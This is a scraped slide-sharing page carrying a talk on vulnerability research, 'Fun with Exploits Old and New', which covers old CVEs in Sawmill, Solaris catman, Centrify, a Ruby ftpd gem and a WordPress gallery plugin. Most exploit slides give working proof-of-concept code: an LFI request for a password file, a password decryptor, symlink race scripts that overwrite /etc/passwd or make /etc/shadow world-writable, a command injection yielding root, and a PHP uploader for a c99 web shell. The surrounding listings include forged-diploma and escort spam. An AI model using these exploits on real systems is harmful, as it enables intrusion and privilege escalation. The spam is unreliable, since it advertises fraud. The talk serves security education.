SpotFlow: Tracking Method Calls and States at RuntimeSpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at Runtimeandrehoraa
 
Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Andreas Granig
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaHanief Utama
 
What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....kzayra69
 
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Natan Silnitsky
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityNeo4j
 
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样umasea
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureDinusha Kumarasiri
 
Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)Ahmed Mater
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Velvetech LLC
 
Intelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmIntelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmSujith Sukumaran
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based projectAnoyGreter
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024StefanoLambiase
 
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...OnePlan Solutions
 

Último (20)

英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作
 
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
 
Introduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdfIntroduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdf
 
Xen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfXen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdf
 
SpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at RuntimeSpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at Runtime
 
Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief Utama
 
What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....
 
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered Sustainability
 
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
 
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort ServiceHot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with Azure
 
Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...
 
Advantages of Odoo ERP 17 for Your Business
Advantages of Odoo ERP 17 for Your BusinessAdvantages of Odoo ERP 17 for Your Business
Advantages of Odoo ERP 17 for Your Business
 
Intelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmIntelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalm
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based project
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
 
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
 

Fun with Exploits Old and New: Software Behavior and Exploitation

  • 1. Fun with Exploits Old and New How software is expected to behave, how it really behaves and how we can exploit it Larry W. Cashdollar 11/13/2015 V1.9
  • 2. Who Am I • 15 years at Akamai Technologies • ​Hobbyist Vulnerability Researcher • ​100+ Vulnerabilities discovered • ​Formerly Unix Systems Administrator 17 years • ​Penetration Tester Back in Late 90s • Enjoy Writing and Breaking Code • This is my second time speaking in public
  • 3. Terminology • CVE – Common Vulnerabilities and Exposure • Root shell – gaining access to administrative user on Unix system • Web shell – a web based shell used to access the system via HTTP • Vulnerability – A flaw in a piece of software • PoC – Proof of Concept
  • 4. What is this all about? • Concepts • Methodologies • Mind set • How can I break this? • Think like a hacker
  • 5. Why bother hacking stuff? • Improves software security • Improves stability • It’s like solving a puzzle • Can be a lot of fun • Improves your skills • And……..
  • 6. Exploiting a vulnerability you found feels like
  • 7. Some common Vulnerabilities • LFI (Local File Inclusion) • RFI (Remote File Inclusion) • RCE (Remote Command Execution) • Race Condition • SQL Injection • XSS (Cross Site Scripting) • Command Injection
  • 8. Concepts • Unchecked User Input • User Input is expected to behave • Abuse Program Flow • Unintended functionality • Abuse software privilege
  • 10. IRIX Midikeys: CVE 1999-0765
  • 11. CVE: 1999-0765 setuid root binary abuse • Binary executes with root privileges • Allows modification of sensitive system files
  • 12. Exploit CVE-1999-0765 • Open /etc/passwd as a .wav file • Or export WINEDITOR=/usr/X11/bin/xterm
  • 13. Sawmill LFI & weak encryption CVE- 2000-0589 & 0588 • Log analysis server listens on port 8987 • LFI can read first line of any word readable file • Admin password stored in local file • Admin password encrypted with custom algorithm
  • 14. Exploiting CVE-2000-0589 & 0588 • $ curl http://192.168.1.65:8987/sawmill?rfcf+%22/etc/sawmill/adminpwd.db%2 2+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3 • Returns encrypted password Am@duZw • Simple substitution cypher • Wrote code to decrypt… for my palm pilot IIIxe
  • 15.
  • 16. PoC for CVE-2000-0589 & 0588 1. #include <stdio.h> 2. 3. char alpha ="abcdefghijklmnopqrstuvwxyz0123456789!@$%^&()_+~<>?:"{}|"; 4. char *encode="=GeKMNQS~TfUVWXY[abcygimrs"$&-]FLq4.@wICH2!oEn}Z%(Ovt{z"; 5. 6. int 7. main (int argc, char **argv) 8. { 9. 10. int x, y; 11. char cypher[128]; 12. 13. strncpy (cypher, argv[1], 128); 14. 15. for (x = 0; x < strlen (cypher); x++) { 16. 17. for (y = 0; y < strlen (encode); y++) 18. if (cypher[x] == encode[y]){ 19. printf ("%c", alpha[y]); 20. break; 21. } 22. } 23. 24. printf("n"+" could also be a space [ ]n"); 25. } • Decrypted password was ‘wookie’ • Access to modify administrative control panel • Developer gave me a free license 
  • 17. Solaris catman file clobbering vulnerability CVE-2000-0095 • Creates files in /tmp insecurely • Uses guessable filenames • Doesn’t check to see if file already exists • Creates files in /tmp as /tmp/sman_PID • We can guess next filename and symlink to /etc/passwd
  • 18. PoC 1. #!/usr/local/bin/perl -w 2. # http://vapid.dhs.org 3. $clobber = "/etc/passwd"; 4. #file to clobber 5. $X=getpgrp(); 6. $Xc=$X; 7. #Constant 8. $Y=$X+1000; 9. #Constant 10. while($X < $Y) { 11. print "Linking /tmp/sman_$X to $clobber :"; 12. # Change $clobber to what you want to clobber. 13. if (symlink ($clobber, "/tmp/sman_$X")) { 14. print "Sucessn"; 15. } else 16. { 17. print "failed, Busy system?n"; 18. } 19. $X=$X+1; 20. } 21. #Watch /tmp and see if catman is executed in time. 22. while(1) { 23. $list = "/usr/bin/ls -l /tmp | grep sman|grep root |"; 24. open (list,$list) or "die cant open ls...n"; 25. while(<list>) { 26. @args = split "_",$_; 27. chop ($args[1]); 28. if ($args[1] >= $Xc && $args[1] <= $Y) 29. { 30. print "Looks like pid $args[1] is the winnern cleaning....n"; 31. `/usr/bin/rm -f /tmp/sman*`; 32. exit(1); 33. } 34. } 35. }
  • 19. Exploit Results • /etc/passwd overwritten with contents of sman_pid • System hosed
  • 21. Centrify CVE-2012-6348 /tmp race condition local root • Administrative control daemon for system management • Creates a file in /tmp as centrify.cmd.0 • Executes that file as shell script! • Executes as root!
  • 22. CVE-2012-6348 PoC Wins race condition 50% of the time: $ while (true) ; do echo "chmod 777 /etc/shadow" >> /tmp/centrify.cmd.0; done After the system is refreshed via administrative control job: $ ls -l /etc/shadow -rwxrwxrwx 1 root shadow 1010 Dec 7 21:57 /etc/shadow
  • 23. CVE-2012-6348 Better PoC • Wins race condition 100% of the time • Written in C • Uses inotify() to detect file modification and creation • Too long to display here
  • 24. Ftpd ruby gem command injection CVE-2013-2512 • FTP server developed in ruby • Code examination reveals remote command injection 208 def ls(ftp_path, option) 209 path = expand_ftp_path(ftp_path) 210 dirname = File.dirname(path) 211 filename = File.basename(path) 212 command = [ 213 'ls', 214 option, 215 filename, <-- unsanitized user controlled input 216 '2>&1', 217 ].compact.join(' ') 218 if File.exists?(dirname) <- file has to exist to exec ls command 219 list = Dir.chdir(dirname) do 220 `{command}` <-- passed to shell here
  • 25. CVE-2013-2512 PoC $ ftp localhost Connected to localhost. 220 ftpd Name (localhost:root): anonymous 331 Password required Password: 230 Logged in Remote system type is UNIX. Using binary mode to transfer files. * I already created the filename foobar by uploading a file ftp> ls foobar;id 200 PORT command successful 150 Opening ASCII mode data connection -rw-r--r-- 1 root root 0 Mar 2 05:52 adfasdf uid=0(root) gid=0(root) groups=0(root) 226 Transfer complete
  • 26. wp-powerplaygallery vulnerable SQL injection code CVE 2015-5599 131: $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date` ) VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."',' ".$_REQUEST['name']."',1,'','NULL')"; 133 : $wpdb->query($query);
  • 27. Blind SQLi Exploit • Sqlmap $ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp- powerplaygallery/upload.php --data "albumid=1” —dbms mysql –level 5 – risk 3
  • 28. wp-powerplaygallery vulnerable RFI Code CVE-2015-5681 50 $targetDir = $upload_dir['basedir'] . '/power_play/'.$_REQUEST['albumid'].'_ uploadfolder'; 51 $cleanupTargetDir = true; // Remove old files 52 $maxFileAge = 5 * 3600; // Temp file age in seconds 53 54 // Create target dir 55 if (!file_exists($targetDir)) { 56 @mkdir($targetDir); 57 } . 148: // Read binary input stream and append it to temp file 149: if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) { 150: die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}'); 151: } . 158: while ($buff = fread($in, 4096)) { 159: fwrite($out, $buff); 160: }
  • 29. RFI Exploit Requirements • POST request • Variable albumid must point at existing album in database • File to upload must exist locally • Use c99 shell as our payload • file variable contains payload with local full path • name variable contains our filename
  • 30. PoC Exploit 1. <?php 2. $target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp- powerplaygallery/upload.php'; 3. $file_name_with_full_path = '/var/www/shell.php’; 4. echo "POST to $target_url $file_name_with_full_path"; 5. $post = array('albumid'=>’4' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path); 6. $ch = curl_init(); 7. curl_setopt($ch, CURLOPT_URL,$target_url); 8. curl_setopt($ch, CURLOPT_POST,1); 9. curl_setopt($ch, CURLOPT_POSTFIELDS, $post); 10. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); 11. $result=curl_exec ($ch); 12. curl_close ($ch); 13. echo "<hr>"; 14. echo $result; 15. echo "<hr>"; 16. ?>